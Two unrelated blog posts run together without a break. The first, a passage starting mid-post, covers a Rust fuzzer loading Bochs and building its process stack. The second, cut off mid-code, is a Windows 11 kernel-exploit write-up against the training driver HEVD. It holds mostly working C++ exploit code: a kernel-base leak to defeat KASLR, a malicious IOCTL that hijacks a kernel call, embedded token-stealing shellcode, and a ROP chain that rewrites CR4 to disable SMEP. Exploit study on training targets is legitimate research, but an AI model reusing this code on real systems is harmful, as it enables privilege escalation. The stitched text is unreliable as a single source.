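// Hypothetical helper: prepend a u64 (little-endian) to the front of the
// stack vector, so index 0 is always the current top of the stack
fn push_u64(stack: &mut Vec<u8>, value: u64) {
    let bytes = value.to_le_bytes();
    // Insert in reverse so the bytes land at the front in LE order
    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

fn main() {
    let mut stack = Vec::new();
    push_u64(&mut stack, 0u64);          // end-marker goes in first
    push_u64(&mut stack, 0xdeadbeefu64); // next value lands on top of it
    assert_eq!(stack.len(), 2 * U64_SIZE);
    // The most recently pushed value sits at the lowest offset
    assert_eq!(u64::from_le_bytes(stack[0..8].try_into().unwrap()), 0xdeadbeef);
}
```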
Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument `--bochs-args` which serves as a delineation point between the two argument categories; every argument after `--bochs-args` is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute addresses when we need to place pointers to the strings in the `argv` vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string-pushing routine just so we didn't have to deal with any weird pointer values. This isn't necessary, but it makes the stack state easier for me to reason about. This is performed with the following logic:
// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();
// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);
// Parse the argv entries for Bochs
let args = parse_bochs_args();
// Store the length of the strings including padding
let mut arg_lens = Vec::new();
// For each argument, push a string onto the stack and store its offset
// location
for arg in args.iter() {
let old_len = stack_data.len();
push_string(&mut stack_data, arg.to_string());
// Calculate arg length and store it
let arg_len = stack_data.len() - old_len;
arg_lens.push(arg_len);
}
Pushing strings is performed like this:
// Pushes a NULL terminated string onto the "stack" and pads the string with
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
// Convert the string to bytes and append it to the stack
let mut bytes = string.as_bytes().to_vec();
// Add a NULL terminator
bytes.push(0x0);
// We're adding bytes in reverse because we're adding to index 0 always,
// we want to pad these strings so that they remain 8-byte aligned so that
// the stack is easier to reason about imo
if bytes.len() % U64_SIZE > 0 {
let pad = U64_SIZE - (bytes.len() % U64_SIZE);
for _ in 0..pad { bytes.push(0x0); }
}
for &byte in bytes.iter().rev() {
stack.insert(0, byte);
}
}
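As a sanity check on that alignment behavior, the padded length `push_string` produces can be computed directly. This is my own sketch of the arithmetic; the example strings are the arguments used later in the post:

```rust
const U64_SIZE: usize = 8;

// A string of n bytes plus its NULL terminator is rounded up to the
// next multiple of 8, matching push_string's padding
fn padded_len(s: &str) -> usize {
    let with_nul = s.len() + 1;
    (with_nul + U64_SIZE - 1) / U64_SIZE * U64_SIZE
}

fn main() {
    assert_eq!(padded_len("-AAAAA"), 8);       // 6 + NULL = 7  -> 8
    assert_eq!(padded_len("./bochs"), 8);      // 7 + NULL = 8  -> 8
    assert_eq!(padded_len("-BBBBBBBBBB"), 16); // 11 + NULL = 12 -> 16
}
```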
Then we add some padding and the auxiliary vector members:
// Add some padding
push_u64(&mut stack_data, 0u64);
// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);
// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);
// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);
// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);
// Add AT_RANDOM key which is 25, this is where the start routines will
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);
Then, since we ignored the environment variables, we just push a `NULL` pointer onto the stack for `envp` and also the `NULL` pointer terminating the `argv` vector:
// Since we skipped envvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);
// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);
This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data, now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists, which includes the strings, and we know how many pointers and members we have left to add to the stack (the number of args and `argc`). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the `argv` pointers onto the stack. We calculate the length as follows:
// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();
// Add argv pointers
stack_length += args.len() * POINTER_SIZE;
// Add argc
stack_length += std::mem::size_of::<u64>();
Next, we start at the bottom of the stack and create a movable `offset` which will track through the stack, stopping at the beginning of each string so that we can calculate its absolute address. The `offset` represents how deep into the stack from the top we are. At first, the `offset` is the largest value it can be because it's at the bottom of the stack (the higher memory address). We subtract from it in order to point towards the beginning of each `argv` string we pushed onto the stack. So the bottom of the stack looks something like this:
NULL
string_1
string_2
end-marker <--- offset
So, armed with the arguments and their lengths that we recorded, we can adjust the `offset` each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though: on the first iteration, we have to account for the end-marker and its 8 bytes. So this is how the logic goes:
// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accommodate the "end-marker" that we
// added to the stack at the beginning. So we need to move the offset up
// the size of the end-marker and then the size of the argument itself.
// After that, we only have to accommodate the argument lengths when
// moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
// First argument, account for end-marker
if idx == 0 {
curr_offset -= arg_len + U64_SIZE;
}
// Not the first argument, just account for the string length
else {
curr_offset -= arg_len;
}
// Calculate the absolute address
let absolute_addr = (stack_addr + curr_offset) as u64;
// Push the absolute address onto the stack
push_u64(&mut stack_data, absolute_addr);
}
It's pretty cool, and it seems to work! Finally, we cap the stack off with `argc` and we are done populating all of the stack data in a vector. Next, we'll want to actually copy the data onto the stack allocation, which is straightforward, so no code snippet there.
The last piece of information worth noting here is that I created a constant called `STACK_DATA_MAX`, and the length of the stack data cannot exceed that tunable value. We use this value to set up `RSP` when we jump to the program in memory and start executing. `RSP` is set to the absolute lowest address possible, which is the stack allocation base plus the stack allocation size minus `STACK_DATA_MAX`. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into, since the stack grows down in memory.
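The arithmetic is simple enough to sketch. The `STACK_DATA_MAX` value here is an assumption (the post only says it's tunable), as is the base address:

```rust
const STACK_SIZE: usize = 0x100000;   // the 1MB stack allocation
const STACK_DATA_MAX: usize = 0x1000; // assumed tunable value, not from the post

// RSP points at the start of the reserved stack-data region at the high
// end of the allocation; everything below it is slack for growth
fn calculate_rsp(stack_base: usize) -> usize {
    stack_base + STACK_SIZE - STACK_DATA_MAX
}

fn main() {
    let stack_base = 0x7f51_3f01_d000; // made-up mmap return value
    let rsp = calculate_rsp(stack_base);
    // The slack available below RSP is the allocation minus the
    // reserved data region
    assert_eq!(rsp - stack_base, STACK_SIZE - STACK_DATA_MAX);
}
```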
Executing the Loaded Program
Everything at this point should be set up perfectly in memory, and all we have to do is jump to the target code and start executing. For now, I haven't fleshed out a context-switching routine or anything; we're literally just going to jump to the program, execute it, and hope everything goes well. The code I used to achieve this is very simple:
pub fn start_bochs(bochs: Bochs) {
// Set RAX to our jump destination which is the program entry, clear RDX,
// and set RSP to the correct value
unsafe {
asm!(
"mov rax, {0}",
"mov rsp, {1}",
"xor rdx, rdx",
"jmp rax",
in(reg) bochs.entry,
in(reg) bochs.rsp,
);
}
}
The reason we clear `RDX` is that if the `_start` routine sees a non-zero value in `RDX`, it will interpret that to mean we are registering a hook, located at the address in `RDX`, to be invoked when the program exits. We don't have one we want to run, so for now we `NULL` it out. The other register values don't really matter. We move the program entry point into `RAX` and use it as a long jump target, and we supply our handcrafted `RSP` so that the program has a stack to use to do its relocations and run properly.
dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
- ./bochs
- -AAAAA
- -BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$
The program runs, parses our command line args, and exits, all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…
Will Bochs Run?
We have to see, right? First we have to compile Bochs as a `-static-pie` ELF, which was a headache in itself, but I was able to figure it out.
dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
Bochs x86 Emulator 2.7
Built from SVN snapshot on August 1, 2021
Timestamp: Sun Aug 1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]
-n no configuration file
-f configfile specify configuration file
-q quick start (skip configuration interface)
-benchmark N run Bochs in benchmark mode for N millions of emulated ticks
-dumpstats N dump Bochs stats every N millions of emulated ticks
-r path restore the Bochs state from path
-log filename specify Bochs log file name
-unlock unlock Bochs images leftover from previous session
--help display this help and exit
--help features display available features / devices and exit
--help cpu display supported CPU models and exit
For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[ ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[ ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM ] quit_sim called with exit code 1
Bochs runs! It couldn't make sense of our nonsense command line arguments, but we loaded it and ran it successfully.
Next Steps
The very next step, and blog post, will be developing a context-switching routine that we will use to transition between fuzzer execution and Bochs execution. This will involve saving our state each time, and it will function basically the same way a normal user-to-kernel context switch does.
After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we'll try to run that in the fuzzer.
Resources
- I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
- Also shoutout @netspooky for helping me understand the stack layout!
- Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)
Code
How a simple K-TypeConfusion took me 3 months to create an exploit [HEVD] - Windows 11 (build 22621)
Have you ever tested something for so long that it became part of your life? That's what happened to me over the last few months, when a simple TypeConfusion vulnerability almost made me go crazy!
Introduction
In this blog post, we will talk about my experience with a simple vulnerability that, for some reason, was the hardest and most confusing thing I have ever seen in the context of kernel exploitation.
We will cover the following topics:
- TypeConfusion: We will discuss how this vulnerability impacts the Windows kernel, and how, as researchers, we can manipulate it and implement an exploit from user land in order to get privileged access on the operating system.
- ROP chain: A method to make the RIP register jump through Windows kernel addresses in order to execute code. With this technique, we can manipulate the order of execution on our stack and, from there, reach the user-land shellcode.
- Kernel ASLR bypass: A way to leak kernel memory addresses; with the correct base address, we are able to calculate the memory region we want to use later.
- Supervisor Mode Execution Prevention (SMEP): A mechanism that blocks all execution from user-land addresses. If it is enabled in the operating system, you can't JMP/CALL into user land, so you can't simply execute your shellcode directly. This protection has been present since Windows 8.0 (32/64-bit).
- Kernel memory management: Important information about how the kernel interprets memory, including memory paging, segmentation, data transfer, etc., and a description of how the kernel lays out and uses its memory.
- Stack manipulation: The stack is the most notorious thing you will see in this blog post; all my research relies on it, and after rebooting my VM a million times, I can now understand some of the concepts you must consider when writing a stack-based exploit.
VM Setup
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys
Tips for Kernel Exploitation coding
Default Windows functions can often delay exploit development, because many of these functions have "protected values" intended to prevent misuse by attackers or by people who want to modify/manipulate internal values. In many C/C++ programs, you can find an import as follows:
#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>
When winternl.h is included, the default values of numerous functions are overwritten with the values defined in the structs in that header.
// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>
The problem is that when you are manipulating and exploiting functions from user land like NtQuerySystemInformation on "recent" Windows versions, these defined values are "different", blocking and preventing the use of functions which can leak kernel base addresses, and consequently delaying our exploitation phase. So, it's important to make sure the code is crafted to ignore winternl.h and instead define the structs manually, as in the example below:
#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>
#define QWORD uint64_t
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);
// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
INT64 GetKernelBase() {
    // Leak the kernel (ntoskrnl) base address in order to bypass KASLR
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
With this technique, we are now able to use all of the correct struct values without any trouble.
TypeConfusion vulnerability
Utilizing the IDA reverse engineering tool, we can clearly see the correct IOCTL which executes our vulnerable function.
After reversing TriggerTypeConfusion, we have the following code:
// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}
As you can see, the function expects two values from a user-controlled struct, _USER_TYPE_CONFUSION_OBJECT, which contains ObjectID and ObjectType as members. After copying these fields into the kernel-side _KERNEL_TYPE_CONFUSION_OBJECT, it calls TypeConfusionObjectInitializer with our object. The vulnerable code follows below:
__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}
The vulnerability in the code above is implicit in the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectType, which points to a user-controlled address.
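The confusion itself comes from the kernel object storing ObjectType and Callback in overlapping storage (a union, as the IDA output above suggests: the object's ObjectType is printed back through its Callback member). A minimal Rust analogue of that aliasing, purely illustrative and not HEVD code, with `u64` standing in for the function pointer:

```rust
// Illustrative only: the user-supplied ObjectType and the kernel's
// Callback share the same 8 bytes, so whatever integer the user writes
// is later read back as a function pointer
union TypeOrCallback {
    object_type: u64,
    callback: u64, // stands in for a kernel function pointer
}

struct KernelTypeConfusionObject {
    object_id: u64,
    second: TypeOrCallback,
}

fn main() {
    let obj = KernelTypeConfusionObject {
        object_id: 0x4141414141414141,
        second: TypeOrCallback { object_type: 0xDEADBEEFDEADBEEF },
    };
    let _ = obj.object_id;
    // The kernel later reads the same bytes as `callback` and calls them
    let callback = unsafe { obj.second.callback };
    assert_eq!(callback, 0xDEADBEEFDEADBEEF);
}
```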
Exploit Initialization
Knowing about our vulnerability, we'll now focus on the exploit phases.
First of all, we craft our code to communicate with the HEVD driver via an IRP, using the previously obtained IOCTL (0x222023), and after that we send our malicious buffer.
<...snip...>
// ---> Malicious struct <---
typedef struct _USER_CONTROLLED_OBJECT {
    INT64 ObjectID;
    INT64 ObjectType;
} USER_CONTROLLED_OBJECT;
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));
HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
IO_STATUS_BLOCK ioStatusBlock = { 0 }; // NtDeviceIoControlFile writes a full IO_STATUS_BLOCK, not a PVOID
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
exploit();
return 0;
}
After we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECT should look like this.
Now we can clearly understand where exactly this vulnerability lies. The next step would be to JMP into a user-controlled buffer containing shellcode that escalates us to SYSTEM privileges. The issue with this idea lies behind a protection mechanism called Supervisor Mode Execution Prevention (SMEP).
Supervisor Mode Execution Prevention (SMEP)
The main idea behind SMEP protection is to prevent CALL/JMP into user-land addresses. If the SMEP kernel bit is set to 1, it provides a security mechanism that stops supervisor-mode code from fetching instructions out of user-mode memory pages.
According to Core Security,
SMEP: Supervisor Mode Execution Prevention allows pages to
be protected from supervisor-mode instruction fetches. If
SMEP = 1, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible in
user mode
- Detects RING-0 code running in USER SPACE
- Introduced in Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specifically, "Local Privilege Escalation" exploits
must now consider this feature.
Now let's run a practical test to see if it is actually working properly.
<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
IO_STATUS_BLOCK ioStatusBlock = { 0 }; // NtDeviceIoControlFile writes a full IO_STATUS_BLOCK, not a PVOID
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
After running the exploit, we get something like this:
The BugCheck analysis should look similar to the following:
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>
As we can see, SMEP protection appears to be working correctly. The following steps cover how we can manipulate our addresses so that the processor will execute our shellcode buffer.
Return-Oriented Programming against SMEP
Return-Oriented Programming (ROP) is a technique that lets an attacker manipulate the return addresses on the current stack; with this type of attack we can effectively write an assembly program using only short instruction sequences that already exist in memory, chaining execution from address to address.
As CTF101 mentioned:
Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.
The main idea for our exploit lies in using a ROP chain to achieve arbitrary code execution. But how?
x64 CR4 register
As one of the control registers, the CR4 register holds bit flags whose values can differ between operating systems.
When SMEP is implemented, one of those bits records whether SMEP is currently enabled; the kernel uses it to decide whether a CALL/JMP into user-land addresses should be possible during execution.
As Wikipedia says:
A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.
On my operating system build, Windows 11 22621, we can clearly see this register's value in WinDBG:
The main idea now is to flip the correct bit in order to neutralize SMEP, and after that JMP into the attacker's shellcode.
With this in mind, we need to get back into our exploit source code and craft our ROP chain to achieve this goal. The question is, how?
We know that we need to change the CR4 value and that a ROP chain can help us; we also first need to bypass Kernel ASLR, due to the randomization of addresses in kernel land. The following steps cover how to get the correct gadgets for the attack.
Virtualization-based security (VBS)
When manipulating the CR4 register through a ROP chain, it's important to note that if the attacker miscalculates the value during the bit-flip phase and the Virtualization-based Security bit is enabled, the system catches the exception and crashes after the attempted change of the CR4 register value.
According to Microsoft:
Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.
If for some reason you see an error as below, it's probably a miscalculation of the value which should be placed into the CR4 register.
<...snip...>
// An example of a miscalculated CR4 value
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
